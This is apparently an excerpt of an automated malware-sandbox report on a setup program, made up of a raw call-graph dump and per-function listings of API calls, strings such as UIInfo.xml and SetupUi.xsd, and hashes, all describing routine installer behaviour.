RtlFreeHeap 72800->72799 72804 69d73b32 72801->72804 72805 69dc8f0e ctype RtlFreeHeap 72801->72805 72802->72799 72802->72800 72803->72801 72806 69d73b4c 72804->72806 72807 69dc8f0e ctype RtlFreeHeap 72804->72807 72805->72804 72808 69da8cd5 ctype 101 API calls 72806->72808 72810 69d73b52 72806->72810 72807->72806 72809 69d73b6b 72808->72809 73340 69da8a98 72809->73340 72813 69dc8f0e ctype RtlFreeHeap 72810->72813 72815 69d73c74 72813->72815 72817 69dc8f0e ctype RtlFreeHeap 72815->72817 72818 69d73c7f ctype 72817->72818 72818->72611 72819 69d73bf2 72822 69d73c13 72819->72822 72824 69dc8f0e ctype RtlFreeHeap 72819->72824 72820 69da8cd5 ctype 101 API calls 72821 69d73bb6 72820->72821 72823 69da8a98 ctype 67 API calls 72821->72823 72825 69d73c26 72822->72825 72826 69dc8f0e ctype RtlFreeHeap 72822->72826 72828 69d73bda 72823->72828 72824->72822 72827 69d73c39 72825->72827 72829 69dc8f0e ctype RtlFreeHeap 72825->72829 72826->72825 72827->72810 72831 69dc8f0e ctype RtlFreeHeap 72827->72831 72830 69da85bc ctype KiUserExceptionDispatcher 72828->72830 72829->72827 72830->72819 72831->72810 72833 69d73a16 ctype 111 API calls 72832->72833 72835 69d741e9 72833->72835 72834 69d741fa 72837 69d741a9 72834->72837 72835->72834 72836 69d73a16 ctype 111 API calls 72835->72836 72836->72834 73423 69db657a 72837->73423 72841 69dcc030 72840->72841 72846 69dcbfc1 72840->72846 72869 69dd1247 _DecodePointerInternal 72841->72869 72843 69dcc036 72870 69dcbd29 66 API calls __getptd_noexit 72843->72870 72844 69dcbfcc 72844->72846 72863 69dd11f5 66 API calls 2 library calls 72844->72863 72864 69dd1041 66 API calls 8 library calls 72844->72864 72865 69dcd835 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 72844->72865 72846->72844 72848 69dcbfef RtlAllocateHeap 72846->72848 72851 69dcc01c 72846->72851 72855 69dcc01a 72846->72855 72866 69dd1247 _DecodePointerInternal 72846->72866 72848->72846 72849 69dcc028 72848->72849 72849->72627 72867 69dcbd29 66 API calls __getptd_noexit 
72851->72867 72868 69dcbd29 66 API calls __getptd_noexit 72855->72868 72857->72627 72858->72634 72859->72631 72861 69dd14df KiUserExceptionDispatcher 72860->72861 72862 69dd14d3 72860->72862 72861->72635 72862->72861 72863->72844 72864->72844 72866->72846 72867->72855 72868->72849 72869->72843 72870->72849 72872 69dc8e58 72871->72872 72873 69d77cad 72871->72873 72899 69dc8e8c 72872->72899 72873->72640 72876 69d77cf4 __EH_prolog3 72875->72876 72902 69da833e 72876->72902 72878 69d77d16 72910 69d77ee4 72878->72910 72880 69d77d25 72918 69dc8f0e 72880->72918 72884 69d77d3d ctype 72885 69dc8f0e ctype RtlFreeHeap 72884->72885 72886 69d77d5c 72885->72886 72887 69d75dd0 113 API calls 72886->72887 72888 69d77d65 ctype 72887->72888 72889 69dc8f0e ctype RtlFreeHeap 72888->72889 72890 69d77d8a ctype 72889->72890 72936 69d75485 72890->72936 72892 69d77daf ctype 72893 69dc8f0e ctype RtlFreeHeap 72892->72893 72894 69d77dd4 72893->72894 72946 69d7575e 72894->72946 72896 69d77ddd ctype 72897 69dc8f0e ctype RtlFreeHeap 72896->72897 72898 69d77e02 ctype 72897->72898 72898->72643 72900 69dd14aa __CxxThrowException@8 KiUserExceptionDispatcher 72899->72900 72901 69dc8ea5 72900->72901 72903 69da834a __EH_prolog3 72902->72903 72904 69dc8e54 ctype KiUserExceptionDispatcher 72903->72904 72905 69da8357 72904->72905 72951 69dafe8a 72905->72951 72908 69da8371 ctype 72908->72878 72911 69d77ef0 __EH_prolog3 72910->72911 73034 69dc8eab 72911->73034 72916 69dc8f0e ctype RtlFreeHeap 72917 69d77f26 ctype 72916->72917 72917->72880 72919 69dc8f1d 72918->72919 72920 69d77d34 72918->72920 73050 69dd54f2 72919->73050 72922 69d75dd0 72920->72922 72923 69d75ddc __EH_prolog3 72922->72923 73053 69d75c6f 72923->73053 72925 69d75df0 72926 69dc8eab std::bad_exception::bad_exception 67 API calls 72925->72926 72927 69d75e01 72926->72927 73063 69d75e41 72927->73063 72929 69d75e13 72930 69da84b9 ctype 101 API calls 72929->72930 72931 69d75e1c 72930->72931 72932 69dc8f0e ctype RtlFreeHeap 72931->72932 72933 69d75e27 
72932->72933 72934 69dc8f0e ctype RtlFreeHeap 72933->72934 72935 69d75e32 ctype 72934->72935 72935->72884 73098 69dd6e1a 72936->73098 72938 69d75491 GetModuleHandleW 72939 69d754a6 72938->72939 72940 69d754b3 GetProcAddress 72938->72940 72941 69da833e ctype 110 API calls 72939->72941 72942 69d754c5 72940->72942 72943 69d754cb GetNativeSystemInfo 72940->72943 72945 69d754b1 ctype 72941->72945 72942->72943 73099 69d74ea3 72943->73099 72945->72892 73110 69d75727 GetModuleHandleW 72946->73110 72950 69d7578e 72950->72896 72952 69da8364 72951->72952 72953 69dafe96 72951->72953 72952->72908 72955 69dc8c76 72952->72955 72953->72952 72959 69da8b33 110 API calls ctype 72953->72959 72956 69dc8c84 ctype 72955->72956 72960 69dc8bdc 72956->72960 72959->72952 72961 69dc8be9 72960->72961 72962 69dc8bf0 72960->72962 72981 69dc8b95 KiUserExceptionDispatcher RtlFreeHeap ctype 72961->72981 72964 69dc8c02 72962->72964 72965 69dc8e8c ctype KiUserExceptionDispatcher 72962->72965 72975 69dc8d91 72964->72975 72965->72964 72968 69dc8c1d 72982 69dcb6ef 66 API calls 2 library calls 72968->72982 72969 69dc8c31 72983 69dcb1f3 72969->72983 72972 69dc8c2f 72992 69dc8dcd 72972->72992 72974 69dc8bee 72974->72908 72976 69dc8d9c 72975->72976 72977 69dc8da6 72975->72977 72978 69dc8e8c ctype KiUserExceptionDispatcher 72976->72978 72979 69dc8c14 72977->72979 73006 69dc8d3a 72977->73006 72978->72977 72979->72968 72979->72969 72981->72974 72982->72972 72986 69dcb204 _memset 72983->72986 72989 69dcb200 _memmove 72983->72989 72984 69dcb20a 73029 69dcbd29 66 API calls __getptd_noexit 72984->73029 72986->72984 72987 69dcb24f 72986->72987 72986->72989 72987->72989 73031 69dcbd29 66 API calls __getptd_noexit 72987->73031 72989->72972 72991 69dcb20f 73030 69dcecf4 11 API calls __close 72991->73030 72993 69dc8dd1 72992->72993 72994 69dc8dd8 72993->72994 72995 69dc8e8c ctype KiUserExceptionDispatcher 72993->72995 72994->72974 72997 69dc8dee 72995->72997 72998 69dc8e8c ctype KiUserExceptionDispatcher 72997->72998 
72999 69dc8e27 72997->72999 73032 69dcb4c9 66 API calls _vwprintf 72997->73032 72998->72997 73000 69dc8d91 ctype 70 API calls 72999->73000 73001 69dc8e2d 73000->73001 73033 69dcb446 97 API calls swprintf 73001->73033 73003 69dc8e3d 73004 69dc8dcd ctype 101 API calls 73003->73004 73005 69dc8e49 73004->73005 73005->72974 73007 69dc8d4b 73006->73007 73008 69dc8d53 73007->73008 73011 69dc8d5c 73007->73011 73013 69dc8c9e 73008->73013 73010 69dc8d5a 73010->72979 73011->73010 73023 69dc8d0b 73011->73023 73014 69dc8cba 73013->73014 73022 69dd563e RtlAllocateHeap 73014->73022 73015 69dc8cc5 73016 69dc8cd0 73015->73016 73017 69dc77cf std::bad_exception::bad_exception KiUserExceptionDispatcher 73015->73017 73018 69dcb1f3 _memcpy_s 66 API calls 73016->73018 73017->73016 73019 69dc8ce9 73018->73019 73020 69dc8f0e ctype RtlFreeHeap 73019->73020 73021 69dc8cfa 73020->73021 73021->73010 73022->73015 73024 69dc8d25 73023->73024 73025 69dc8d17 73023->73025 73026 69dc77cf std::bad_exception::bad_exception KiUserExceptionDispatcher 73024->73026 73027 69dc8d2f 73024->73027 73025->73024 73028 69dd56a7 RtlReAllocateHeap 73025->73028 73026->73027 73027->73010 73028->73024 73029->72991 73030->72989 73031->72991 73032->72997 73033->73003 73037 69dc8eb8 73034->73037 73035 69d77f06 73040 69da84b9 73035->73040 73036 69dc8ee5 73039 69dcb1f3 _memcpy_s 66 API calls 73036->73039 73037->73035 73037->73036 73049 69dc77cf KiUserExceptionDispatcher ctype std::bad_exception::bad_exception 73037->73049 73039->73035 73041 69da84c8 73040->73041 73042 69d77f1e 73040->73042 73043 69da84ea 73041->73043 73044 69da84d5 73041->73044 73042->72916 73045 69dc8bdc ctype 101 API calls 73043->73045 73046 69dc8eab std::bad_exception::bad_exception 67 API calls 73044->73046 73045->73042 73047 69da84da 73046->73047 73048 69dc8f0e ctype RtlFreeHeap 73047->73048 73048->73042 73049->73036 73051 69dd54fd RtlFreeHeap 73050->73051 73052 69dd550b 73050->73052 73051->73052 73052->72920 73055 69d75c7b __EH_prolog3 73053->73055 
73054 69d75cb4 73057 69d75cc6 GetModuleFileNameW 73054->73057 73058 69dc8e8c ctype KiUserExceptionDispatcher 73054->73058 73055->73054 73056 69dc8d3a ctype 70 API calls 73055->73056 73056->73054 73059 69da833e ctype 110 API calls 73057->73059 73058->73057 73060 69d75ce8 73059->73060 73061 69dc8f0e ctype RtlFreeHeap 73060->73061 73062 69d75cf0 ctype 73061->73062 73062->72925 73064 69d75e4d __EH_prolog3 73063->73064 73065 69da833e ctype 110 API calls 73064->73065 73066 69d75e66 73065->73066 73067 69dc8eab std::bad_exception::bad_exception 67 API calls 73066->73067 73068 69d75e77 PathFindFileNameW 73067->73068 73069 69d75e8e PathFindExtensionW 73068->73069 73071 69d75eab 73069->73071 73084 69da89f0 73071->73084 73076 69da84b9 ctype 101 API calls 73077 69d75ee2 73076->73077 73078 69dc8f0e ctype RtlFreeHeap 73077->73078 73079 69d75eed 73078->73079 73080 69dc8f0e ctype RtlFreeHeap 73079->73080 73081 69d75ef8 73080->73081 73082 69dc8f0e ctype RtlFreeHeap 73081->73082 73083 69d75f03 ctype 73082->73083 73083->72929 73085 69da8a15 ctype 67 API calls 73084->73085 73086 69d75ec4 73085->73086 73087 69da8a15 73086->73087 73088 69da8a2a 73087->73088 73089 69da8a6d 73088->73089 73091 69da8a3d 73088->73091 73090 69dc8e8c ctype KiUserExceptionDispatcher 73089->73090 73092 69da8a77 ctype 73090->73092 73091->73092 73093 69da8a5b 73091->73093 73097 69dafeb7 67 API calls 3 library calls 73092->73097 73095 69dc8eab std::bad_exception::bad_exception 67 API calls 73093->73095 73096 69d75ed9 73095->73096 73096->73076 73097->73096 73098->72938 73104 69d74fd5 73099->73104 73102 69da833e ctype 110 API calls 73103 69d74f56 73102->73103 73103->72945 73105 69d74ffd 73104->73105 73108 69d75085 GetSystemMetrics 73105->73108 73109 69d75001 73105->73109 73106 69dcb091 __call_reportfault 5 API calls 73107 69d74eb2 73106->73107 73107->73102 73108->73109 73109->73106 73111 69d75755 73110->73111 73112 69d7573b GetProcAddress 73110->73112 73115 69d75847 110 API calls 2 library calls 73111->73115 73113 
69d7574e GetSystemInfo 73112->73113 73114 69d7574b 73112->73114 73113->73111 73114->73113 73115->72950 73117 69d77887 __EH_prolog3 73116->73117 73118 69d7789e RegOpenKeyExW 73117->73118 73121 69d77938 ctype 73117->73121 73119 69d778c2 RegQueryValueExW RegCloseKey 73118->73119 73120 69d77908 SHGetFolderPathW 73118->73120 73119->73120 73122 69d778ef GetFileAttributesW 73119->73122 73123 69d7793e 73120->73123 73124 69d7791d 73120->73124 73121->72651 73122->73120 73125 69d77900 73122->73125 73148 69d75d3f 73123->73148 73139 69dcb8ad 73124->73139 73125->73121 73129 69d77930 GetFileAttributesW 73129->73121 73129->73123 73130 69d7795e 73161 69da8e8b 73130->73161 73133 69dc8f0e ctype RtlFreeHeap 73134 69d7797c 73133->73134 73167 69dcb927 73134->73167 73137 69d77991 73138 69dc8f0e ctype RtlFreeHeap 73137->73138 73138->73121 73140 69dcb8c2 73139->73140 73142 69dcb8bb 73139->73142 73176 69dcbd29 66 API calls __getptd_noexit 73140->73176 73142->73140 73144 69dcb8f7 73142->73144 73145 69d77929 73144->73145 73178 69dcbd29 66 API calls __getptd_noexit 73144->73178 73145->73123 73145->73129 73147 69dcb8c7 73177 69dcecf4 11 API calls __close 73147->73177 73149 69d75d4b __EH_prolog3 73148->73149 73150 69d75d8c GetModuleFileNameW 73149->73150 73151 69dc8d3a ctype 70 API calls 73149->73151 73179 69dc8afc 73150->73179 73153 69d75d89 73151->73153 73153->73150 73155 69da833e ctype 110 API calls 73156 69d75dad 73155->73156 73184 69da8f73 73156->73184 73159 69dc8f0e ctype RtlFreeHeap 73160 69d75dc0 ctype 73159->73160 73160->73130 73162 69da8ea9 73161->73162 73163 69da8eb0 PathCombineW 73161->73163 73164 69dc8d3a ctype 70 API calls 73162->73164 73165 69dc8afc ctype KiUserExceptionDispatcher 73163->73165 73164->73163 73166 69d77971 73165->73166 73166->73133 73168 69dcb93c 73167->73168 73169 69dcb935 73167->73169 73189 69dcbd29 66 API calls __getptd_noexit 73168->73189 73169->73168 73174 69dcb95d 73169->73174 73171 69dcb941 73190 69dcecf4 11 API calls __close 73171->73190 73173 69d77986 
GetFileAttributesW 73173->73137 73174->73173 73191 69dcbd29 66 API calls __getptd_noexit 73174->73191 73176->73147 73177->73145 73178->73147 73180 69dc8b01 _wcsnlen 73179->73180 73181 69d75da4 73180->73181 73182 69dc8e8c ctype KiUserExceptionDispatcher 73180->73182 73181->73155 73183 69dc8b34 73182->73183 73185 69dc8d91 ctype 70 API calls 73184->73185 73186 69da8f83 PathRemoveFileSpecW 73185->73186 73187 69dc8afc ctype KiUserExceptionDispatcher 73186->73187 73188 69d75db8 73187->73188 73188->73159 73189->73171 73190->73173 73191->73171 73193 69da9073 __EH_prolog3 73192->73193 73194 69da90b5 73193->73194 73195 69da9094 73193->73195 73197 69dc8e8c ctype KiUserExceptionDispatcher 73193->73197 73196 69dc8eab std::bad_exception::bad_exception 67 API calls 73194->73196 73198 69da90db ctype 73194->73198 73195->73198 73200 69dcbe92 73195->73200 73196->73198 73197->73195 73198->72660 73201 69dcbebc 73200->73201 73202 69dcbea1 73200->73202 73204 69dcbed1 73201->73204 73231 69dce733 67 API calls __close 73201->73231 73202->73201 73203 69dcbead 73202->73203 73230 69dcbd29 66 API calls __getptd_noexit 73203->73230 73209 69dd0f64 73204->73209 73208 69dcbeb2 _memset 73208->73194 73210 69dd0f6f 73209->73210 73211 69dd0f7a 73209->73211 73212 69dcbfb3 _malloc 66 API calls 73210->73212 73213 69dd0f82 73211->73213 73221 69dd0f8f 73211->73221 73214 69dd0f77 73212->73214 73215 69dcbe0e _free 66 API calls 73213->73215 73214->73208 73229 69dd0f8a __dosmaperr 73215->73229 73216 69dd0fc7 73233 69dd1247 _DecodePointerInternal 73216->73233 73218 69dd0f97 RtlReAllocateHeap 73218->73221 73218->73229 73219 69dd0fcd 73234 69dcbd29 66 API calls __getptd_noexit 73219->73234 73220 69dd0ff7 73236 69dcbd29 66 API calls __getptd_noexit 73220->73236 73221->73216 73221->73218 73221->73220 73226 69dd0fdf 73221->73226 73232 69dd1247 _DecodePointerInternal 73221->73232 73225 69dd0ffc GetLastError 73225->73229 73235 69dcbd29 66 API calls __getptd_noexit 73226->73235 73228 69dd0fe4 GetLastError 73228->73229 
73229->73208 73230->73208 73231->73204 73232->73221 73233->73219 73234->73229 73235->73228 73236->73225 73241 69d73c8f 73237->73241 73239 69d744a0 73239->72769 73240->72773 73242 69d73c9b __EH_prolog3 73241->73242 73243 69da833e ctype 110 API calls 73242->73243 73244 69d73cb7 73243->73244 73245 69dc8e54 ctype KiUserExceptionDispatcher 73244->73245 73246 69d73cca 73245->73246 73247 69d73a16 ctype 111 API calls 73246->73247 73248 69d73cdd 73247->73248 73249 69d73ded 73248->73249 73250 69da89f0 ctype 67 API calls 73248->73250 73251 69dc8f0e ctype RtlFreeHeap 73249->73251 73252 69d73cfe 73250->73252 73253 69d73e36 ctype 73251->73253 73254 69da84b9 ctype 101 API calls 73252->73254 73253->73239 73255 69d73d07 73254->73255 73256 69dc8f0e ctype RtlFreeHeap 73255->73256 73257 69d73d16 73256->73257 73284 69da8989 73257->73284 73261 69d73d29 ctype 73262 69dc8f0e ctype RtlFreeHeap 73261->73262 73263 69d73d48 73262->73263 73264 69d73d50 73263->73264 73267 69d73def _wcspbrk 73263->73267 73265 69da89f0 ctype 67 API calls 73264->73265 73266 69d73d5e 73265->73266 73268 69da84b9 ctype 101 API calls 73266->73268 73267->73249 73270 69da8aed ctype 67 API calls 73267->73270 73269 69d73d67 73268->73269 73271 69dc8f0e ctype RtlFreeHeap 73269->73271 73272 69d73e17 73270->73272 73276 69d73d76 ctype 73271->73276 73273 69da84b9 ctype 101 API calls 73272->73273 73274 69d73e20 73273->73274 73275 69dc8f0e ctype RtlFreeHeap 73274->73275 73275->73249 73276->73249 73277 69da8aed ctype 67 API calls 73276->73277 73278 69d73dc5 73277->73278 73279 69da84b9 ctype 101 API calls 73278->73279 73280 69d73dce 73279->73280 73281 69dc8f0e ctype RtlFreeHeap 73280->73281 73282 69d73ddd 73281->73282 73302 69da8636 101 API calls 2 library calls 73282->73302 73303 69da8931 73284->73303 73286 69da8992 73288 69da89a9 73286->73288 73311 69dcc49f 73286->73311 73289 69d73d1d 73288->73289 73290 69dc8d91 ctype 70 API calls 73288->73290 73295 69da8aed 73289->73295 73291 69da89bc 73290->73291 73314 69dc7942 67 API calls 2 

Control-flow Graph

APIs
• __EH_prolog3.LIBCMT ref: 698F6981
  • Part of subcall function 698E1E75: __EH_prolog3.LIBCMT ref: 698E1E7C
  • Part of subcall function 698E1E75: GetThreadLocale.KERNEL32(?,00000004,698E6734,0000004C,0000004C,698E7142,?,00000000), ref: 698E1E8E
• CoCreateInstance.OLE32(698D7980,00000000,00000017,698D7970,?,?,00000068,698F65A6,?,?,?,?,698F2A30,?,00000000,?), ref: 698F69AC
• PathIsRelativeW.SHLWAPI(?,?,?,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 698F6A7F
• PathFileExistsW.SHLWAPI(?,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271), ref: 698F6A8C
• PathFileExistsW.SHLWAPI(?,?,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 698F6ABE
• PathFileExistsW.SHLWAPI(?,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271), ref: 698F6AC1
• CoCreateInstance.OLE32(698D7990,00000000,00000017,698D79A0,?), ref: 698F6B4C
  • Part of subcall function 698DC98C: GetThreadLocale.KERNEL32 ref: 698DC999
  • Part of subcall function 698DB93E: __EH_prolog3.LIBCMT ref: 698DB945
  • Part of subcall function 698EF21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,698DC3AE), ref: 698EF241
• VariantClear.OLEAUT32(?), ref: 698F6BBD
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
• PathIsRelativeW.SHLWAPI(?,?), ref: 698F6BE8
• PathFileExistsW.SHLWAPI(?), ref: 698F6BF5
• PathFileExistsW.SHLWAPI(?,?), ref: 698F6C27
• PathFileExistsW.SHLWAPI(?), ref: 698F6C2A
• VariantClear.OLEAUT32(?), ref: 698F6C8E
• __CxxThrowException@8.LIBCMT ref: 698F6CAB
• VariantClear.OLEAUT32(?), ref: 698F6CED
• VariantClear.OLEAUT32(?), ref: 698F6DE9
  • Part of subcall function 698DCA39: __EH_prolog3.LIBCMT ref: 698DCA40
Strings
• UIInfo.xml, xrefs: 698F6D8C, 698F6EC3
• UiInfo.xml, xrefs: 698F6A65
• CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s), xrefs: 698F6B7C
• Validation FAILED Reason:%s, xrefs: 698F6D5F
• SetupUi.xsd, xrefs: 698F6BD7
• Loading file - %s, xrefs: 698F6AF3
• http://schemas.microsoft.com/SetupUI/2008/01/imui, xrefs: 698F6C7A
• CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s), xrefs: 698F69DC
• Stopping XML schema validation of UI information and continuing, xrefs: 698F69FA, 698F6B9A
• Add to schema collection schema file - %s, xrefs: 698F6C4D
• Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s, xrefs: 698F6E8B
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Path$ExistsFile$H_prolog3$ClearVariant$CreateInstanceLocaleRelativeThread$AppendException@8Throw
• String ID: Validation FAILED Reason:%s$Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s$Add to schema collection schema file - %s$CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s)$CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s)$Loading file - %s$SetupUi.xsd$Stopping XML schema validation of UI information and continuing$UIInfo.xml$UiInfo.xml$http://schemas.microsoft.com/SetupUI/2008/01/imui
• API String ID: 3881019808-2332759018
• Opcode ID: cd0201b506f816363c2971ce0f87e8fa6da3764eda5cada5616e73c325daedf8
• Instruction ID: 2aa63c54473d4a06ea128881b0374dcaf8e8d3ba291efd3989e737204a525444
• Opcode Fuzzy Hash: cd0201b506f816363c2971ce0f87e8fa6da3764eda5cada5616e73c325daedf8
• Instruction Fuzzy Hash: AB025B75C0024DEFDF00DFE8C948ADDBBB8AF09308F548958E515BB251D735AA0ACB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA76AE
  • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
• GetModuleHandleW.KERNEL32(kernel32.dll,00000020,69DAF845,?), ref: 69DA7748
• GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 69DA7758
• SetThreadStackGuarantee.KERNEL32(00020000), ref: 69DA776D
• SetUnhandledExceptionFilter.KERNEL32(69DB416A), ref: 69DA7774
• GetCommandLineW.KERNEL32 ref: 69DA777A
  • Part of subcall function 69D77C6E: __EH_prolog3.LIBCMT ref: 69D77C75
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$AddressCommandExceptionFilterGuaranteeHandleLineModuleProcStackThreadUnhandled_malloc
• String ID: SetThreadStackGuarantee$kernel32.dll$passive
• API String ID: 4088884676-825548933
• Opcode ID: 1455cf5666e313d2fc55056dbf74e90fac88413add95672d0efef97fb5fffd1f
• Instruction ID: c99cbadef94c5530a9731f5edb7394c97a4f88c69d7d489fa7a459add86d5c1f
• Opcode Fuzzy Hash: 1455cf5666e313d2fc55056dbf74e90fac88413add95672d0efef97fb5fffd1f
• Instruction Fuzzy Hash: C141AFB5C01380DFDB21CFB9C98469EBBF4BB15304FA0897ED08A9BA51C7319648CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 69D85B8C
• _memset.LIBCMT ref: 69D85BBB
  • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
• FindFirstFileW.KERNEL32(?,?,????), ref: 69D85BDA
• FindNextFileW.KERNELBASE(?,?), ref: 69D85CA8
• FindClose.KERNEL32(?), ref: 69D85CC1
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: Find$File$AppendCloseFirstH_prolog3_NextPath_memset
• String ID: ????
• API String ID: 2365859831-1216582215
• Opcode ID: 7be782d660b73658c5e8001508ba834625bbeb2812111f394fc434a32b1f6dd2
• Instruction ID: 72671cf4484d98518b4ec0e1b39a6aff6ce159237abbae43b9b6928fad7a7c94
• Opcode Fuzzy Hash: 7be782d660b73658c5e8001508ba834625bbeb2812111f394fc434a32b1f6dd2
• Instruction Fuzzy Hash: 55318F75804619DADF10DFA4CD8CBAEB7B8AF01359F0086F5E549E6590DB35CA84CF20
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 698DEFFE
• _memset.LIBCMT ref: 698DF018
• Process32FirstW.KERNEL32(00000000,?), ref: 698DF032
• Process32NextW.KERNEL32(00000000,0000022C), ref: 698DF04D
• FindCloseChangeNotification.KERNEL32(00000000), ref: 698DF061
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32_memset
• String ID:
• API String ID: 949835396-0
• Opcode ID: 37ca6d38e42822d1ef3ccc1cc6da6584643ab74ad56a17890f77d078b65fbf45
• Instruction ID: 092bcfc89f01eab30d7c882c0440fa1136c7d27454fa95b816d02289017cca03
• Opcode Fuzzy Hash: 37ca6d38e42822d1ef3ccc1cc6da6584643ab74ad56a17890f77d078b65fbf45
• Instruction Fuzzy Hash: A401D231901058AFCB10EB65DC4CEAE77B8FF96324F400599E815D7180DB309E49DAE0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Item$MessageSend$CallbackDispatcherParentTextUserWindow
• String ID:
• API String ID: 2000255171-0
• Opcode ID: 1bce5818fe7bb9ddd601f0047e3e7883bd87f72ef4b8f6aa2c4d9ddcdc2f86be
• Instruction ID: 27f4288b63f7162872ab09aa1db72fee70f1d706445c860e9430fc7989f39a30
• Opcode Fuzzy Hash: 1bce5818fe7bb9ddd601f0047e3e7883bd87f72ef4b8f6aa2c4d9ddcdc2f86be
• Instruction Fuzzy Hash: E4C19D71A0420ADFDF14CF68C5A1A9E7BB4FB0A304F50491EF96697282D771E962CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• __EH_prolog3_catch.LIBCMT ref: 69DBB39A
  • Part of subcall function 69DBD446: __EH_prolog3_catch.LIBCMT ref: 69DBD44D
  • Part of subcall function 69DBD446: GetCommandLineW.KERNEL32(0000006C,69DBB3B6,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DBD48E
  • Part of subcall function 69DBD446: CoInitialize.OLE32(00000000), ref: 69DBD4EF
  • Part of subcall function 69DBD713: CreateThread.KERNEL32(00000000,00000000,69DC23E8,?,00000000,00000000), ref: 69DBD729
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DB988C: __EH_prolog3.LIBCMT ref: 69DB9893
